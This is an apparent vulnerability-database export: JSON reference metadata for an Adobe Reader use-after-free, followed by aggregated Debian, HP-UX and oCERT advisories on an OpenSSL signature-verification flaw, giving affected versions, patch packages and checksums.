            "trust": 0.8,
            "url": "http://www.ipa.go.jp/security/ciadr/vul/20100113-adobe.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.jpcert.or.jp/at/2010/at100003.txt"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/cert/jvnta10-013a/"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/tr/jvntr-2010-03/"
          },
          {
            "trust": 0.8,
            "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2009-3959"
          },
          {
            "trust": 0.8,
            "url": "http://www.us-cert.gov/cas/alerts/sa10-013a.html"
          },
          {
            "trust": 0.8,
            "url": "http://www.npa.go.jp/cyberpolice/index.html#topics"
          },
          {
            "trust": 0.6,
            "url": "http://www.nsfocus.net/vulndb/14342"
          },
          {
            "trust": 0.3,
            "url": "http://www.adobe.com"
          },
          {
            "trust": 0.3,
            "url": "http://support.nortel.com/go/main.jsp?cscat=bltndetail\u0026id=991610"
          },
          {
            "trust": 0.3,
            "url": "/archive/1/508949"
          },
          {
            "trust": 0.1,
            "url": "https://cwe.mitre.org/data/definitions/189.html"
          },
          {
            "trust": 0.1,
            "url": "https://access.redhat.com/errata/rhsa-2010:0037"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov"
          },
          {
            "trust": 0.1,
            "url": "http://www.vupen.com/english/research.php"
          },
          {
            "trust": 0.1,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2009-3959"
          },
          {
            "trust": 0.1,
            "url": "http://www.vupen.com/exploits"
          },
          {
            "trust": 0.1,
            "url": "http://www.vupen.com/english/services"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/secunia_security_advisories/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/business_solutions/"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org"
          },
          {
            "trust": 0.1,
            "url": "http://secunia.com/advisories/about_secunia_advisories/"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#508357"
          },
          {
            "db": "VULHUB",
            "id": "VHN-41405"
          },
          {
            "db": "VULMON",
            "id": "CVE-2009-3959"
          },
          {
            "db": "BID",
            "id": "37756"
          },
          {
            "db": "PACKETSTORM",
            "id": "85207"
          },
          {
            "db": "PACKETSTORM",
            "id": "83870"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-092"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001020"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3959"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#508357"
          },
          {
            "db": "VULHUB",
            "id": "VHN-41405"
          },
          {
            "db": "VULMON",
            "id": "CVE-2009-3959"
          },
          {
            "db": "BID",
            "id": "37756"
          },
          {
            "db": "PACKETSTORM",
            "id": "85207"
          },
          {
            "db": "PACKETSTORM",
            "id": "83870"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-092"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2010-001020"
          },
          {
            "db": "NVD",
            "id": "CVE-2009-3959"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2009-12-15T00:00:00",
            "db": "CERT/CC",
            "id": "VU#508357"
          },
          {
            "date": "2010-01-13T00:00:00",
            "db": "VULHUB",
            "id": "VHN-41405"
          },
          {
            "date": "2010-01-13T00:00:00",
            "db": "VULMON",
            "id": "CVE-2009-3959"
          },
          {
            "date": "2010-01-12T00:00:00",
            "db": "BID",
            "id": "37756"
          },
          {
            "date": "2010-01-16T01:01:58",
            "db": "PACKETSTORM",
            "id": "85207"
          },
          {
            "date": "2009-12-15T13:39:57",
            "db": "PACKETSTORM",
            "id": "83870"
          },
          {
            "date": "2010-01-13T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201001-092"
          },
          {
            "date": "2010-02-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2010-001020"
          },
          {
            "date": "2010-01-13T19:30:00.593000",
            "db": "NVD",
            "id": "CVE-2009-3959"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2010-06-18T00:00:00",
            "db": "CERT/CC",
            "id": "VU#508357"
          },
          {
            "date": "2018-10-30T00:00:00",
            "db": "VULHUB",
            "id": "VHN-41405"
          },
          {
            "date": "2018-10-30T00:00:00",
            "db": "VULMON",
            "id": "CVE-2009-3959"
          },
          {
            "date": "2010-02-01T21:31:00",
            "db": "BID",
            "id": "37756"
          },
          {
            "date": "2011-07-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201001-092"
          },
          {
            "date": "2010-02-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2010-001020"
          },
          {
            "date": "2025-04-09T00:30:58.490000",
            "db": "NVD",
            "id": "CVE-2009-3959"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-092"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Adobe Acrobat and Reader contain a use-after-free vulnerability in the JavaScript Doc.media.newPlayer method",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#508357"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "digital error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201001-092"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-200901-0714

    Vulnerability from variot - Updated: 2026-03-09 22:53

    OpenSSL 0.9.8i and earlier does not properly check the return value from the EVP_VerifyFinal function, which allows remote attackers to bypass validation of the certificate chain via a malformed SSL/TLS signature for DSA and ECDSA keys. F5's FirePass server is a powerful network device that can provide users with secure access to the company's network through any standard web browser. F5 FirePass products have unidentified security vulnerabilities, allowing malicious users to conduct fraud and forgery attacks. OpenSSL is prone to a signature-verification vulnerability. An attacker would likely leverage this issue to conduct phishing attacks or impersonate legitimate sites. Other attacks are also possible. Releases prior to OpenSSL 0.9.8j are affected.

    For the stable distribution (etch), this problem has been fixed in version 0.9.8c-4etch4 of the openssl package, and version 0.9.7k-3.1etch2 of the openssl097 package.

    For the unstable distribution (sid), this problem has been fixed in version 0.9.8g-15.

    The testing distribution (lenny) will be fixed soon.

    We recommend that you upgrade your OpenSSL packages.

    Upgrade instructions


    wget url will fetch the file for you dpkg -i file.deb will install the referenced file.

    If you are using the apt-get package manager, use the line for sources.list as given below:

    apt-get update will update the internal database apt-get upgrade will install corrected packages

    You may use an automated update by adding the resources from the footer to the proper configuration.

    Debian GNU/Linux 4.0 alias etch


    Source archives:

    http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k-3.1etch2.dsc Size/MD5 checksum: 1069 fb69818a28ead5b3026dcafc1f5e92d5 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c.orig.tar.gz Size/MD5 checksum: 3313857 78454bec556bcb4c45129428a766c886 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4.diff.gz Size/MD5 checksum: 56230 ad913155fe55d659741976a1be02ee48 http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k.orig.tar.gz Size/MD5 checksum: 3292692 be6bba1d67b26eabb48cf1774925416f http://security.debian.org/pool/updates/main/o/openssl097/openssl097_0.9.7k-3.1etch2.diff.gz Size/MD5 checksum: 34518 845a986c8a5170953c1e88c2d9965176 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4.dsc Size/MD5 checksum: 1107 fd0b477d237c473e3f1491e8821b155d

    alpha architecture (DEC Alpha)

    http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_alpha.deb Size/MD5 checksum: 2561904 e0499757c84819b0cb4919de45e733c4 http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_alpha.deb Size/MD5 checksum: 3822008 a63ea4834f1be21cf7dacd7a60817914 http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_alpha.deb Size/MD5 checksum: 2209796 1d008a2d9fcb466c0e1393fd6cf1dced http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_alpha.deb Size/MD5 checksum: 4558410 af0dcd956ae91457c01c5152bea8c775 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_alpha.deb Size/MD5 checksum: 1026098 957ee2ef34a7aa24c41903eea6d1db51 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_alpha.deb Size/MD5 checksum: 2621108 d42a2d70f27723a8dc9aab1dfb83ad10 http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_alpha.udeb Size/MD5 checksum: 677162 039dd8968e77f09312fc4e502601b6fe

    amd64 architecture (AMD x86_64 (AMD64))

    http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_amd64.deb Size/MD5 checksum: 891116 0d771317a58430e6ecea1e38e6889ef4 http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_amd64.udeb Size/MD5 checksum: 580208 f08c5d2e4649dd9f077b440d3cd35963 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_amd64.deb Size/MD5 checksum: 1655264 ec946f04aa2fae3a001be8c7ae330839 http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_amd64.deb Size/MD5 checksum: 753788 e5521b844646e69b1b8f2daa872b83b8 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_amd64.deb Size/MD5 checksum: 992378 417077b8de5a56b9dad0667f2ab5b6e2 http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_amd64.deb Size/MD5 checksum: 2178820 effca1afcd65d7e418f3cb75dd875b1d http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_amd64.deb Size/MD5 checksum: 1326428 670a34f7c39343a7939ba43c4658821c

    hppa architecture (HP PA RISC)

    http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_hppa.deb Size/MD5 checksum: 1586088 66b4b504f0e67fc74c9a98e1f6e8cbac http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_hppa.deb Size/MD5 checksum: 1274896 2dc2191758d272e05461f574bd50031b http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_hppa.deb Size/MD5 checksum: 1030994 cfe12740f5f0492a05646851dc042ba8 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_hppa.deb Size/MD5 checksum: 945354 e001f9834b3a7fbfd69963118afc7922 http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_hppa.deb Size/MD5 checksum: 793836 489e8472b5b300e2627cd25be399f42f http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_hppa.udeb Size/MD5 checksum: 631120 18fb83375c2b5a6689703c1219ad4f65 http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_hppa.deb Size/MD5 checksum: 2248436 0c045e8c6dcc0ee3e89d1808b3818eed

    i386 architecture (Intel ia32)

    http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_i386.deb Size/MD5 checksum: 2285788 a1b0456725a0ca95457c74672a235097 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_i386.deb Size/MD5 checksum: 1015498 04dd57145bc4d8fbd728bba329e7dc72 http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_i386.udeb Size/MD5 checksum: 554698 e30b6a20efd74af8bbd5bfb5e9241113 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_i386.deb Size/MD5 checksum: 2721068 abec8c0872781f622454d14ae4e39bad http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_i386.deb Size/MD5 checksum: 4646314 e0a3f1a4d622f7a6a8886bb1bdf56bbe http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_i386.deb Size/MD5 checksum: 2094162 fe95acfa9d541760bbb0c0ed86982bcb http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_i386.deb Size/MD5 checksum: 5582804 aa194f9d43a3890d810e81086b4ee473

    ia64 architecture (Intel ia64)

    http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_ia64.deb Size/MD5 checksum: 1263564 be2a79505ff0ae08e19c8ceeafdf7a08 http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_ia64.deb Size/MD5 checksum: 2593624 3a198fb3a4a51e81340d2a1175766c91 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_ia64.deb Size/MD5 checksum: 1569658 4dbd1a9c3f4d0fe2b8906a8555e26105 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_ia64.deb Size/MD5 checksum: 1071264 45a62ed67f0ad2168cab559b45aa7de6 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_ia64.deb Size/MD5 checksum: 1192358 c28adf2245854e3b368d7f88590fc730 http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_ia64.udeb Size/MD5 checksum: 801742 ce515f87f93a6364b22f94c5840a4729 http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_ia64.deb Size/MD5 checksum: 1010004 4222d05c1eb0ce929c68f7c8cc11ecd3

    mips architecture (MIPS (Big Endian))

    http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_mips.deb Size/MD5 checksum: 1693440 29a8f61c5cfb619d20235fb91cf9ff3b http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_mips.udeb Size/MD5 checksum: 580128 fc3af402963b6fa4d24b89a4afcd8bc3 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_mips.deb Size/MD5 checksum: 876210 f87b4773e3c70539302f5af3b51800b9 http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_mips.deb Size/MD5 checksum: 993434 02a232c80759b81c67df2e6e6a2cca26 http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_mips.deb Size/MD5 checksum: 2258938 be0d32157248efd6f87f450630ce22ef

    mipsel architecture (MIPS (Little Endian))

    http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_mipsel.deb Size/MD5 checksum: 992856 85a14404d0cae1d5100721d014d5ee29 http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_mipsel.deb Size/MD5 checksum: 2255990 1bd0adee660543138600882fc2e42d81 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_mipsel.deb Size/MD5 checksum: 1649560 22c06f600378978e094230c172db8ca4 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_mipsel.deb Size/MD5 checksum: 860700 bc11dc6212a74c8ca4bf6d314f929dff http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_mipsel.deb Size/MD5 checksum: 718942 4ad8442b8812dfe2fd4fcbe06591c3c2 http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_mipsel.deb Size/MD5 checksum: 1317060 1d35b7e67204b5b31ab16c2514c69e02 http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_mipsel.udeb Size/MD5 checksum: 566226 1300061de87860cdf5ecfaeb26839c5f

    powerpc architecture (PowerPC)

    http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_powerpc.deb Size/MD5 checksum: 743386 7e189844da3112f289ff8f96458b7d6e http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_powerpc.deb Size/MD5 checksum: 1002204 24f2f0ec4aa965ff9057f7055322b70e http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_powerpc.deb Size/MD5 checksum: 1728492 6074f055c8257f19962341a29c0dc1c2 http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_powerpc.deb Size/MD5 checksum: 1382114 41b6f5900e7a6361625a7fde3329d389 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_powerpc.deb Size/MD5 checksum: 895634 495901098cb75b870810b6abcb82c187 http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_powerpc.deb Size/MD5 checksum: 2210874 5b27bc4f2f2fc1c15957242a383b9921 http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_powerpc.udeb Size/MD5 checksum: 585332 5cb7f5d282dd56d2825253006fc4ac29

    s390 architecture (IBM S/390)

    http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_s390.deb Size/MD5 checksum: 1317066 0e843e8f68a84557d8f9306c61609283 http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_s390.deb Size/MD5 checksum: 2193894 d3d5eeb042d82e5b383177e08136b3cc http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_s390.deb Size/MD5 checksum: 951570 621f50aae93efdd5c31a94071e93eaa9 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_s390.deb Size/MD5 checksum: 1633204 4e6a635c45caa90a0f28f58286b5b2bf http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_s390.deb Size/MD5 checksum: 1014480 639c707aed6efc331f1c3b6b14322ee0 http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_s390.deb Size/MD5 checksum: 794236 3bc1224270f26fb7b85eae99b18a1e97 http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_s390.udeb Size/MD5 checksum: 643020 41a09437ea5130fe0daed09edd4e6423

    sparc architecture (Sun SPARC/UltraSPARC)

    http://security.debian.org/pool/updates/main/o/openssl/libcrypto0.9.8-udeb_0.9.8c-4etch4_sparc.udeb Size/MD5 checksum: 539054 4807d481d7878ea7032d7aa9747e95e0 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8_0.9.8c-4etch4_sparc.deb Size/MD5 checksum: 2124310 91c54b669eae9e38ae65486d5f082c6b http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7-dbg_0.9.7k-3.1etch2_sparc.deb Size/MD5 checksum: 3418866 a6805a9c7125b04e0c226b2a90c9d5d2 http://security.debian.org/pool/updates/main/o/openssl097/libssl0.9.7_0.9.7k-3.1etch2_sparc.deb Size/MD5 checksum: 1801340 af40fbabcf27d1c8a81d18f3e3d4ac4d http://security.debian.org/pool/updates/main/o/openssl/libssl-dev_0.9.8c-4etch4_sparc.deb Size/MD5 checksum: 2113338 c5e7dd09e9c4133e9a06a286ace5b7ed http://security.debian.org/pool/updates/main/o/openssl/openssl_0.9.8c-4etch4_sparc.deb Size/MD5 checksum: 1020946 713c98cac975ec8c0c64c96812353f82 http://security.debian.org/pool/updates/main/o/openssl/libssl0.9.8-dbg_0.9.8c-4etch4_sparc.deb Size/MD5 checksum: 4089498 b1c0f345c3d51a9dea6dd07a003e6e4e

    These files will probably be moved into the stable distribution on its next update. HP System Management Homepage (SMH) before v3.0.1.73 running on Linux and Windows 2003, 2008. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1

    SUPPORT COMMUNICATION - SECURITY BULLETIN

    Document ID: c01706219 Version: 1

    HPSBUX02418 SSRT090002 rev.1 - HP-UX Running OpenSSL, Remote Unauthorized Access

    NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

    Release Date: 2009-03-31 Last Updated: 2009-03-30

    Potential Security Impact: Remote unauthorized access

    Source: Hewlett-Packard Company, HP Software Security Response Team

    VULNERABILITY SUMMARY A potential security vulnerability has been identified with HP-UX running OpenSSL. The vulnerability could be exploited remotely to allow an unauthorized access.

    References: CVE-2008-5077

    SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11, B.11.23, B.11.31 running OpenSSL

    BACKGROUND

    CVSS 2.0 Base Metrics

    Reference Base Vector Base Score CVE-2008-5077 (AV:R/AC:L/Au:N/C:N/I:P/A:N) 5.0 =============================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002.

    RESOLUTION

    HP has provided the following patches to resolve this vulnerability. The patches are available from the following location:

    URL: http://software.hp.com

    HP-UX Release HP-UX OpenSSL version

    B.11.11 (11i v1) A.00.09.07m.046

    B.11.23 (11i v2) A.00.09.07m.047

    B.11.31 (11i v3) A.00.09.08j.003

    MANUAL ACTIONS: Yes - Update

    PRODUCT SPECIFIC INFORMATION

    HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa

    The following text is for use by the HP-UX Software Assistant.

    AFFECTED VERSIONS

    HP-UX B.11.11

    fips_1_1_2.FIPS-CONF fips_1_1_2.FIPS-DOC fips_1_1_2.FIPS-INC fips_1_1_2.FIPS-LIB fips_1_1_2.FIPS-MAN fips_1_1_2.FIPS-MIS fips_1_1_2.FIPS-RUN fips_1_1_2.FIPS-SRC action: install revision FIPS-OPENSSL-1.1.2.046 or subsequent fips_1_2.FIPS-CONF fips_1_2.FIPS-DOC fips_1_2.FIPS-INC fips_1_2.FIPS-LIB fips_1_2.FIPS-MAN fips_1_2.FIPS-MIS fips_1_2.FIPS-RUN fips_1_2.FIPS-SRC action: install revision FIPS-OPENSSL-1.2.001 or subsequent openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.07m.046 or subsequent URL: http://software.hp.com

    HP-UX B.11.23

    fips_1_1_2.FIPS-CONF fips_1_1_2.FIPS-DOC fips_1_1_2.FIPS-INC fips_1_1_2.FIPS-LIB fips_1_1_2.FIPS-MAN fips_1_1_2.FIPS-MIS fips_1_1_2.FIPS-RUN fips_1_1_2.FIPS-SRC action: install revision FIPS-OPENSSL-1.1.2.047 or subsequent fips_1_2.FIPS-CONF fips_1_2.FIPS-DOC fips_1_2.FIPS-INC fips_1_2.FIPS-LIB fips_1_2.FIPS-LIB fips_1_2.FIPS-MAN fips_1_2.FIPS-MIS fips_1_2.FIPS-RUN fips_1_2.FIPS-RUN fips_1_2.FIPS-SRC action: install revision FIPS-OPENSSL-1.2.002 or subsequent openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.07m.047 or subsequent URL: http://software.hp.com

    HP-UX B.11.31

    fips_1_1_2.FIPS-CONF fips_1_1_2.FIPS-DOC fips_1_1_2.FIPS-INC fips_1_1_2.FIPS-LIB fips_1_1_2.FIPS-MAN fips_1_1_2.FIPS-MIS fips_1_1_2.FIPS-RUN fips_1_1_2.FIPS-SRC action: install revision FIPS-OPENSSL-1.1.2.048 or subsequent fips_1_2.FIPS-CONF fips_1_2.FIPS-DOC fips_1_2.FIPS-INC fips_1_2.FIPS-LIB fips_1_2.FIPS-MAN fips_1_2.FIPS-MIS fips_1_2.FIPS-RUN fips_1_2.FIPS-SRC action: install revision FIPS-OPENSSL-1.2.003 or subsequent openssl.OPENSSL-CER openssl.OPENSSL-CONF openssl.OPENSSL-DOC openssl.OPENSSL-INC openssl.OPENSSL-LIB openssl.OPENSSL-MAN openssl.OPENSSL-MIS openssl.OPENSSL-PRNG openssl.OPENSSL-PVT openssl.OPENSSL-RUN openssl.OPENSSL-SRC action: install revision A.00.09.08j.003 or subsequent URL: http://software.hp.com

    END AFFECTED VERSIONS

    HISTORY Version:1 (rev.1) 31 March 2009 Initial release

    Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.

    Support: For further information, contact normal HP Services support channel.

    Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com It is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially exploit information. To get the security-alert PGP key, please send an e-mail message as follows: To: security-alert@hp.com Subject: get key

    Subscribe: To initiate a subscription to receive future HP Security Bulletins via Email: http://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC On the web page: ITRC security bulletins and patch sign-up Under Step1: your ITRC security bulletins and patches - check ALL categories for which alerts are required and continue. Under Step2: your ITRC operating systems - verify your operating system selections are checked and save.

    To update an existing subscription: http://h30046.www3.hp.com/subSignIn.php Log in on the web page: Subscriber's choice for Business: sign-in. On the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.

    To review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do

    • The Software Product Category that this Security Bulletin relates to is represented by the 5th and 6th characters of the Bulletin number in the title:

    GN = HP General SW MA = HP Management Agents MI = Misc. 3rd Party SW MP = HP MPE/iX NS = HP NonStop Servers OV = HP OpenVMS PI = HP Printing & Imaging ST = HP Storage SW TL = HP Trusted Linux TU = HP Tru64 UNIX UX = HP-UX VV = HP VirtualVault

    System management and security procedures must be reviewed frequently to maintain system integrity. HP is continually reviewing and enhancing the security features of software products to provide customers with current secure solutions.

    "HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products the important security information contained in this Bulletin. HP recommends that all users determine the applicability of this information to their individual situations and take appropriate action. HP does not warrant that this information is necessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages resulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose, title and non-infringement."

    \xa9Copyright 2009 Hewlett-Packard Development Company, L.P.

    Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental, special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: PGP 8.1

    iQA/AwUBSdNBjeAfOvwtKn1ZEQI07wCg4iu1Jn5I5OInhZq8nYL+a/9MT2UAoPGR gTd3Vf2bK3bnrFOIBFl0/t75 =vt7j -----END PGP SIGNATURE----- . #2008-016 multiple OpenSSL signature verification API misuse

    Description:

    Several functions inside the OpenSSL library incorrectly check the result after calling the EVP_VerifyFinal function.

    This bug allows a malformed signature to be treated as a good signature rather than as an error. This issue affects the signature checks on DSA and ECDSA keys used with SSL/TLS.

    A patch fixing the issue with proper return code checking and further important recommendations are described in the original OpenSSL Team advisory.

    At the request of the OpenSSL team, oCERT has aided in the remediation coordination for other projects with similar API misuse vulnerabilities. In addition to EVP_VerifyFinal, the return codes from DSA_verify and DSA_do_verify functions were being incorrectly validated, and packages doing so are affected in a similar fashion as OpenSSL.

    NTP <= 4.2.4p5 (production), <= 4.2.5p150 (development)

    Sun GridEngine <= 5.3

    Gale <= 0.99

    OpenEvidence <= 1.0.6

    Belgian eID middleware - eidlib <= 2.6.0 [2]

    Freedom Network Server <= 2.x

    The following packages were identified as affected by a vulnerability similar to the OpenSSL one, as they use OpenSSL DSA_verify function and incorrectly check the return code.

    BIND <= 9.4.3

    Lasso <= 2.2.1

